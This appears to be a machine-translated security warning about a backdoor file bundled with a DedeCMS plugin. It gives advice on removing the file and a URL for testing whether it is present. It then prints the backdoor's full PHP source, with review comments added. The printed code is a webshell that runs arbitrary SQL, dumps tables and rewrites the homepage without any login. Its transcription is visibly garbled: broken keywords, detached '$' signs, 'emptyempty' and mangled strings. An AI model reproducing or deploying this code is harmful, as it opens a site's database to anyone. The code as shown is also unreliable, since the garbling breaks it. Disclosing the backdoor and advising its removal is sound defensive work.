Remove the official webshell: after the collection master is installed, immediately delete the dedesql.query.php file under the include directory. If it has already been installed, the file may have been renamed to arc.sqlquery.class.php; find and delete it. This file can be used to query the website database without any login verification and to perform operations such as updating, deleting, and querying data. You can also test whether it is present as follows:
http://yourdomainname.com/include/dedesql.query.php?dopost=viewinfo
Opening the URL above brings up the webshell interface.
Frankly, this looks like a deliberately planted backdoor program. This one has been discovered; who knows whether more backdoors will emerge in the next so-called new version. The code of the file in question is as follows:
The code is as follows:
<? Php
// Backdoor file discussed above (include/dedesql.query.php). The only thing it
// includes is the CMS bootstrap; no login or session check appears anywhere in
// this file, so every $dopost branch below is reachable without authentication.
Require_once (dirname (_ FILE _). "/../include/common. inc. php ");
// $dopost, $tablename, $sqlquery and $querytype are never assigned in this file;
// the HTML form further down posts fields with these names, so they presumably
// arrive as request variables registered by common.inc.php -- confirm there.
// NOTE(review): "emptyempty" looks like a transcription artefact of empty().
If (emptyempty ($ dopost ))
{
$ Dopost = "";
}
// "rename": renames this script to arc.sqlquery.class.php so that a search for
// the original filename no longer finds it. When cleaning up, check for both
// names under the include directory.
// NOTE(review): the single "=" in these comparisons is most likely a
// transcription artefact of "==" (as written it would be an assignment).
If ($ dopost = "rename ")
{
If (rename ('dedesql. query. php', 'arc. sqlquery. class. php ')){
Echo "successful! ";
} Else {
Echo "failed! ";
}
Exit ();
}
// "viewinfo": prints the CREATE TABLE statement of the requested table inside
// an <xmp> block. $tablename is concatenated straight into the SQL text with
// no escaping or whitelist check.
If ($ dopost = "viewinfo ")
{
If (emptyempty ($ tablename ))
{
Echo "no table name specified! ";
}
Else
{
$ Dsql-> SetQuery ("show create table". $ dsql-> dbName. ".". $ tablename );
$ Dsql-> Execute ('me ');
// Column 1 of SHOW CREATE TABLE is the DDL text.
$ Row2 = $ dsql-> GetArray ('me', MYSQL_BOTH );
$ Ctinfo = $ row2 [1];
Echo "<xmp>". trim ($ ctinfo). "</xmp> ";
}
Exit ();
}
// "index": regenerates the site homepage. The output path is read from the
// dede_homepageset row, the file is truncated by the fopen(...,'w') and then
// rewritten from the configured template through PartView. Because no
// authentication precedes this branch, anyone can trigger the rewrite.
If ($ dopost = "index ")
{
Require_once (DEDEINC. '/arc. partview. class. php ');
$ Envs = $ _ sys_globals = array ();
$ Envs ['aid '] = 0;
$ Pv = new PartView ();
$ Row = $ pv-> dsql-> GetOne ('select * From 'dede _ homepageset '');
$ Templet = str_replace ("{style}", $ pai_df_style, $ row ['templet']);
// Path normalisation: backslashes to slashes, then collapse doubled slashes.
$ HomeFile = dirname (_ FILE _). '/'. $ row ['position'];
$ HomeFile = str_replace ("//", "/", str_replace ("\", "/", $ homeFile ));
$ Fp = fopen ($ homeFile, 'w') or die ("unable to update website homepage to: $ homeFile location ");
Fclose ($ fp );
$ Tpl = $ pai_basedir. $ pai_templets_dir. '/'. $ templet;
$ Pv-> SetTemplet ($ tpl );
$ Pv-> SaveToHtml ($ homeFile );
$ Pv-> Close ();
Echo "homepage updated successfully! ";
Exit ();
}
// "query": executes caller-supplied SQL against the site database. The only
// filter is the eregi() check for "drop ... table" / "drop ... database";
// SELECT statements have their first 100 rows printed, and every other
// statement (INSERT/UPDATE/DELETE included) is passed to ExecuteNoneQuery.
// eregi() and split() are the POSIX regex functions removed in PHP 7.
Else if ($ dopost = "query ")
{
$ Sqlquery = trim (stripslashes ($ sqlquery ));
If (eregi ("drop (. *) table", $ sqlquery) | eregi ("drop (. *) database", $ sqlquery ))
{
Echo "<span style = 'font-size: 10pt '> statements for deleting 'data' or 'database' cannot be executed here. </Span> ";
Exit ();
}
// Read path: run the SELECT and dump the result set.
If (eregi ("^ select", $ sqlquery ))
{
$ Dsql-> SetQuery ($ sqlquery );
$ Dsql-> Execute ();
If ($ dsql-> GetTotalRow () <= 0)
{
Echo "run SQL: {$ sqlquery}, no returned records! ";
}
Else
{
Echo "run SQL: {$ sqlquery}, total". $ dsql-> GetTotalRow (). "records, up to 100 records are returned! ";
}
$ J = 0;
While ($ row = $ dsql-> GetArray ())
{
$ J ++;
If ($ j> 100)
{
Break;
}
// NOTE(review): the next two lines are garbled in this transcription (two
// opened Echo strings); presumably a record header followed by the foreach.
Echo "Echo "record: $ j ";
Echo "Foreach ($ row as $ k => $ v)
{
// Column names and values are echoed into the HTML without escaping.
Echo "<font color = 'red' >{$ k }:</font >{$ v} <br/> \ r \ n ";
}
}
Exit ();
}
// Write path, multi-line mode (querytype 2): split the text on ";" + newline
// and run each statement on its own, counting successes and collecting errors.
If ($ querytype = 2)
{
$ Sqlquery = str_replace ("\ r", "", $ sqlquery );
$ Sqls = split ("; [\ t] {0 ,}\ n", $ sqlquery );
$ NerrCode = ""; $ I = 0;
Foreach ($ sqls as $ q)
{
$ Q = trim ($ q );
If ($ q = "")
{
Continue;
}
$ Dsql-> ExecuteNoneQuery ($ q );
$ ErrCode = trim ($ dsql-> GetError ());
If ($ errCode = "")
{
$ I ++;
}
Else
{
$ NerrCode. = "execution: <font color = 'blue'> $ q </font> error. error message: <font color = 'red'> ". $ errCode. "</font> <br> ";
}
}
Echo "{$ I} SQL statements are successfully executed! <Br> ";
Echo $ nerrCode;
}
// Write path, single-statement mode: run the whole text as one statement.
Else
{
$ Dsql-> ExecuteNoneQuery ($ sqlquery );
$ NerrCode = trim ($ dsql-> GetError ());
Echo "one SQL statement is successfully executed! <Br> ";
Echo $ nerrCode;
}
Exit ();
}
// "view": renders the admin-styled HTML front end. It contains two forms that
// post into the "stafrm" iframe: one with dopost=viewinfo (table picker) and
// one with dopost=query (free SQL textarea). The page is served to anyone,
// which is what the note above means by "the webshell interface".
If ($ dopost = "view ")
{
; Echo '<Head>
<Meta http-equiv = \ 'content-Type \ 'content = \ 'text/html; charset = gb2312 \ '>
<Title> SQL command line tool </title>
<Link href = \ 'img/base.css \ 'rel = \ 'stylesheet \ 'Type = \ 'text/css \ '>
</Head>
<Body background = \ 'img/allbg.gif \ 'leftmargin = \ '8 \ 'topmargin = \ '8 \ '>
<Table width = "98%" border = "0" align = "center" cellpadding = "3" cellspacing = "1" bgcolor = "# D1DDAA">
<Tr>
<Td height = "19" background = "img/tbg.gif">
<Table width = "96%" border = "0" cellspacing = "1" cellpadding = "1">
<Tr>
<Td width = "24%"> <strong> SQL command Runner: </strong> </td>
<Td width = "76%" align = "right"> <B> <a href = "sys_data.php"> <u> data backup </u> </a> </B>
| <B> <a href = "sys_data_revert.php"> <strong> <u> data restoration </u> </strong> </a> </B>
</Td>
</Tr>
</Table>
</Td>
</Tr>
<Tr>
<Td height = "200" bgcolor = "# FFFFFF" valign = "top">
<Table width = "100%" border = "0" cellspacing = "4" cellpadding = "2">
<Form action = "" method = "post" name = "infoform" target = "stafrm">
<Input type = \ 'den den \ 'name = \ 'dopost \ 'value = \ 'viewinfo \'/>
<Tr bgcolor = "# F3FBEC">
<Td width = "15%" height = "24" align = "center"> system table information: </td>
<Td>
<Table width = "100%" border = "0" cellspacing = "0" cellpadding = "0">
<Tr>
& Lt; td width = "35%" & gt;
<Select name = "tablename" id = "tablename" style = "width: 100%" size = "6">
';
// Populate the table picker: every table in the database, each with its row
// count obtained by a separate SELECT COUNT(*).
$ Dsql-> SetQuery ("Show Tables ");
$ Dsql-> Execute ('T ');
While ($ row = $ dsql-> GetArray ('T', MYSQL_BOTH ))
{
$ Dsql-> SetQuery ("Select count (*) From". $ row [0]);
$ Dsql-> Execute ('n ');
$ Row2 = $ dsql-> GetArray ('n', MYSQL_BOTH );
$ Dd = $ row2 [0];
Echo "<option value = '". $ row [0]. "'> ". $ row [0]. "(". $ dd. ") </option> \ r \ n ";
}
// The optimize/repair buttons below set dopost to opimize, repair, opimizeall
// or repairall, but no branch in this file handles those values.
; Echo '</select>
</Td>
<Td width = "2%"> </td>
<Td width = "63%" valign = "bottom">
<Div style = "float: left; margin-right: 20px;">
<Input type = "Submit" name = "Submit1" value = "optimize the selected table" class = "coolbg np" onClick = "this. form. dopost. value = \ 'opimize \ '; "/>
<Br/>
<Input type = "Submit" name = "Submit2" value = "fixed the selected table" class = "coolbg np" onClick = "this. form. dopost. value = \ 'repair \ '; "style =" margin-top: 6px; "/>
<Br/>
<Input type = "Submit" name = "Submit3" value = "View table structure" class = "coolbg np" onClick = "this. form. dopost. value = \ 'viewinfo \ '; "style =" margin-top: 6px; "/>
</Div>
<Div style = "float: left">
<Input type = "Submit" name = "Submit5" value = "optimize all tables" class = "coolbg np" onClick = "this. form. dopost. value = \ 'opimizeall \ '; "/>
<Br/>
<Input type = "Submit" name = "Submit6" value = "repair all tables" class = "coolbg np" onClick = "this. form. dopost. value = \ 'repairall \ '; "style =" margin-top: 6px; "/>
</Div>
</Td>
</Tr>
</Table> </td>
</Tr>
<Tr>
<Td height = "200" align = "center"> return information: </td>
<Td>
<Iframe name = "stafrm" frameborder = "0" id = "stafrm" width = "100%" height = "100%"> </iframe>
</Td>
</Tr>
</Form>
<Form action = "" method = "post" name = "form1" target = "stafrm">
<Input type = \ 'den den \ 'name = \ 'dopost \ 'value = \ 'query \'>
<Tr>
<Td height = "24" colspan = "2" bgcolor = "# F3FBEC"> <strong> run the SQL command line:
<Input name = "querytype" type = "radio" class = "np" value = "0">
Single-line command (supports simple query)
<Input name = "querytype" type = "radio" class = "np" value = "2" checked>
Multi-line command </strong> </td>
</Tr>
<Tr>
<Td height = "118" colspan = "2">
<Textarea name = "sqlquery" cols = "60" rows = "10" id = "sqlquery" style = "width: 90%"> </textarea>
</Td>
</Tr>
<Tr>
<Td height = "53" align = "center"> </td>
<Td>
<Input name = "imageField" type = "image" src = "img/button_ OK .gif" width = "60" height = "22" border = "0" class = \ 'np \ '/>
</Td>
</Tr>
</Form>
</Table>
</Td>
</Tr>
</Table>
</Body>
</Html>
';}
?>